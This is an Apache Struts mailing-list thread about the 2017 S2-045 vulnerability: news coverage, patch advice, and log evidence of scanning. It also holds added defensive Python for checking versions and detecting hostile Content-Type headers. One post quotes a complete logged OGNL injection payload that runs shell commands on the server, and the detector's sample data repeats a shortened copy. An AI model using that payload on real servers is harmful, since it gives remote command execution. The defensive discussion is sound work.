
S2 makes Hacker News :/

10 messages

S2 makes Hacker News :/

Dave Newton-6

Re: S2 makes Hacker News :/

Lukasz Lenart
2017-03-09 15:45 GMT+01:00 Dave Newton <[hidden email]>:
> https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites

Yeah... this is sad news, even if we tried our best to keep this
confidential ...


Regards
--
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/

---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]


Re: S2 makes Hacker News :/

Rene Gielen-2
More of that...
http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC

--
René Gielen
http://twitter.com/rgielen


Re: S2 makes Hacker News :/

Louis Smith
Sad, but what should have been the story is how rapidly the fixes were made
available, and how a properly set up server would not be vulnerable.

Louis



Re: S2 makes Hacker News :/

Doug Erickson
What is the proper server setup to prevent this?


Re: S2 makes Hacker News :/

Lukasz Lenart
2017-03-14 15:57 GMT+01:00 Doug Erickson <[hidden email]>:
> What is the proper server setup to prevent this?

Upgrade to the latest Struts version ... and run the server on a dedicated
account, block access to the world (the server should only be allowed to
connect to localhost) and a few other things


Regards
--
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/
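A quick way to act on the first item of that advice (the version upgrade), as an added example that is not code from this thread or from the Struts project: it tells whether a struts2-core jar predates the S2-045 fix. The fixed releases 2.3.32 and 2.5.10.1 are the ones named later in this thread; the lower bounds of the affected ranges (2.3.5 and 2.5) are taken from the Apache S2-045 advisory, not from the thread. The jar names are constructed sample input, and the `scan_webapp` helper and its WEB-INF/lib path are illustrative.

```python
"""Tell whether a struts2-core jar on the classpath predates the S2-045 fix.

Added example, not from the thread or from the Struts project. The fixed
versions 2.3.32 and 2.5.10.1 are the ones named in the thread; the first
affected releases (2.3.5 and 2.5) are taken from the Apache S2-045 advisory.
The jar names below are constructed sample input.
"""
import re
from pathlib import Path

# Per release branch: first affected version and the version carrying the fix
# (ranges from the S2-045 advisory, an assumption outside this thread).
AFFECTED_FROM = {"2.3": (2, 3, 5), "2.5": (2, 5)}
FIXED_IN = {"2.3": (2, 3, 32), "2.5": (2, 5, 10, 1)}

JAR_NAME = re.compile(r"struts2-core-(\d+(?:\.\d+)+)\.jar$")


def parse_version(text):
    """'2.5.10.1' -> (2, 5, 10, 1); tuples compare component-wise like release numbers."""
    return tuple(int(part) for part in text.split("."))


def is_vulnerable(version):
    """True if a struts2-core of this version lacks the S2-045 fix."""
    v = parse_version(version)
    branch = f"{v[0]}.{v[1]}"
    if branch not in FIXED_IN:
        return False  # branches outside 2.3 / 2.5 are not in the advisory's range
    return AFFECTED_FROM[branch] <= v < FIXED_IN[branch]


def scan_jars(jar_names):
    """Map each struts2-core jar name to whether it is vulnerable; other jars are ignored."""
    result = {}
    for name in jar_names:
        m = JAR_NAME.search(name)
        if m:
            result[name] = is_vulnerable(m.group(1))
    return result


def scan_webapp(webapp_dir):
    """Scan a deployed webapp's WEB-INF/lib (illustrative filesystem helper)."""
    lib = Path(webapp_dir) / "WEB-INF" / "lib"
    return scan_jars(p.name for p in lib.glob("struts2-core-*.jar"))


# Constructed sample jar names, as a WEB-INF/lib listing might show them.
SAMPLE_JARS = [
    "struts2-core-2.3.31.jar",        # last unpatched 2.3.x release
    "struts2-core-2.5.10.1.jar",      # carries the fix
    "commons-fileupload-1.3.2.jar",   # not a Struts jar, ignored
]

if __name__ == "__main__":
    for jar, bad in scan_jars(SAMPLE_JARS).items():
        print(f"{jar}: {'VULNERABLE, upgrade' if bad else 'fixed'}")
```

The comparison is done on integer tuples so that 2.5.10 sorts below 2.5.10.1, which a plain string comparison gets wrong. The other two items in the advice above (a dedicated service account and no outbound network access) are deployment configuration rather than something this script can check.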


Re: S2 makes Hacker News :/

Doug Erickson


> On Mar 14, 2017, at 12:17 PM, Lukasz Lenart <[hidden email]> wrote:
>
> 2017-03-14 15:57 GMT+01:00 Doug Erickson <[hidden email]>:
>> What is the proper server setup to prevent this?
>
> Upgrade to the latest Struts version ... and run server on a dedicated
> account, block access to the world (sever should be only allowed to
> connect to localhost) and few other things

Re: S2 makes Hacker News :/

Greg Huber
In reply to this post by Lukasz Lenart
Just because you are using S2 does not necessarily mean you are affected;
all I get is a response:

HTTP/1.1 404
Content-Length: 0
Date: Thu, 16 Mar 2017 09:02:54 GMT
Connection: close

Looking at my logs, this fishing is going on all the time.

Thanks also Lukasz for the quick fix.

Cheers Greg

Re: S2 makes Hacker News :/

Martin Gainty
________________________________
From: Greg Huber <[hidden email]>
Sent: Thursday, March 16, 2017 5:19 AM
To: Struts Developers List
Subject: Re: S2 makes Hacker News :/

Just because you are using s2, does not necessarily mean you are affected,
all I get is a response :

HTTP/1.1 404
Content-Length: 0
Date: Thu, 16 Mar 2017 09:02:54 GMT
Connection: close

Looking at my logs this fishing is going on all the time.

MG> From what I read, injections only happen with Content-Type injection.

MG> Then again, patches (Struts 2.3.32 or 2.5.10.1) have been available for some time.

MG> Johannes suggests implementing 'snort' to detect injection; vulnerability reference link at sans.edu below:
https://isc.sans.edu/forums/diary/Critical+Apache+Struts+2+Vulnerability+Patch+Now/22169/

MG>Thanks Lukasz!

Thanks also Lukasz for the quick fix.

Cheers Greg

Re: S2 makes Hacker News :/

Greg Huber
Looking at my logs I can see some activity, GRRR:

179.253.10.27 - - [24/Mar/2017:08:39:13 +0000] "GET /notFound.action HTTP/1.1" 404 2258 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

2017-03-24 08:39:13,649 WARN org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest JakartaMultiPartRequest:parse - Request exceeded size limit!
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

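The probe in Greg's log above carries its whole OGNL expression in the Content-Type header, which is also what Martin's Snort suggestion keys on: the value embeds the literal 'multipart/form-data' so that the Struts dispatcher hands the request to the Jakarta multipart parser, and the parser's error message, which quotes the header, was then evaluated as OGNL. The following is an added example, not code from this thread or from Struts itself. It implements the predicate that the Servlet-filter workaround in the Apache S2-045 advisory describes (reject any request whose Content-Type is not a well-formed media type; the advisory is outside this thread), and runs the same predicate over Struts WARN log lines shaped like Greg's. The log lines and header values are constructed samples; the payload in the sample log is Greg's, cut down to the parts the detector keys on.

```python
"""Flag S2-045 probes by validating the Content-Type header.

Added example, not from the thread or from Struts. content_type_is_safe() is
the check a blocking filter would apply before the multipart parser ever sees
the request; scan_struts_log() applies it to WARN lines like Greg's. All
sample data below is constructed.
"""
import re

# OGNL expression openers that have no business in a Content-Type value.
OGNL_MARKER = re.compile(r"[%$]\{")

# Strict media-type grammar (RFC 7231): token "/" token *( ";" token "=" ( token / quoted-string ) ).
# '{', '(', '=' and whitespace are not token characters, so an OGNL expression
# cannot satisfy this regex even without the marker check above.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
PARAM = rf"\s*;\s*{TOKEN}=(?:{TOKEN}|\"(?:[^\"\\]|\\.)*\")"
MEDIA_TYPE = re.compile(rf"^\s*{TOKEN}/{TOKEN}(?:{PARAM})*\s*$")


def content_type_is_safe(value):
    """True if the header is absent, or a well-formed media type with no OGNL marker anywhere."""
    if value is None:
        return True
    if OGNL_MARKER.search(value):       # catches markers hidden inside quoted parameter values too
        return False
    return MEDIA_TYPE.match(value) is not None


def should_reject(headers):
    """Filter decision for one request, given its headers (names matched case-insensitively)."""
    lowered = {name.lower(): value for name, value in headers.items()}
    return not content_type_is_safe(lowered.get("content-type"))


# The Struts WARN line quotes the offending header after this phrase.
LOG_CT = re.compile(r"content type header is (?P<ct>.*)$")
# The probe in the thread stores its shell command in #cmd='...'.
CMD = re.compile(r"#cmd='([^']*)'")


def scan_struts_log(lines):
    """Return (line_no, command or None) for each logged request with a hostile Content-Type."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_CT.search(line)
        if not m or content_type_is_safe(m.group("ct")):
            continue
        cmd = CMD.search(m.group("ct"))
        hits.append((line_no, cmd.group(1) if cmd else None))
    return hits


# Constructed sample log. Line 2 is shaped like Greg's WARN line, with the
# payload cut down to the parts the detector keys on; lines 1 and 3 are noise.
SAMPLE_LOG = [
    "2017-03-24 08:12:40,101 WARN JakartaMultiPartRequest:parse - Request exceeded size limit! "
    "org.apache.commons.fileupload.FileUploadBase$SizeLimitExceededException: the request was "
    "rejected because its size (10485761) exceeds the configured maximum (2097152)",
    "2017-03-24 08:39:13,649 WARN JakartaMultiPartRequest:parse - Request exceeded size limit! "
    "org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't "
    "contain a multipart/form-data or multipart/mixed stream, content type header is "
    "%{(#nike='multipart/form-data').(#cmd='nMaskCustomMuttMoloz').(#cmds={'/bin/bash','-c',#cmd})"
    ".(#p=new java.lang.ProcessBuilder(#cmds)).(#process=#p.start())}",
    "2017-03-24 08:40:01,002 INFO Dispatcher - Unable to find 'struts.multipart.saveDir' property setting.",
]

if __name__ == "__main__":
    for line_no, cmd in scan_struts_log(SAMPLE_LOG):
        print(f"line {line_no}: hostile Content-Type, command={cmd!r}")
```

The grammar check alone already rejects the probe, because `{`, `(` and `=` are not token characters; the marker check is kept as a second line so that a `%{...}` tucked inside a quoted parameter value (which the grammar would accept) is rejected as well. Rejecting malformed headers outright is the policy the advisory's filter workaround describes, so a legitimate client with a broken Content-Type gets a 4xx rather than a parse attempt.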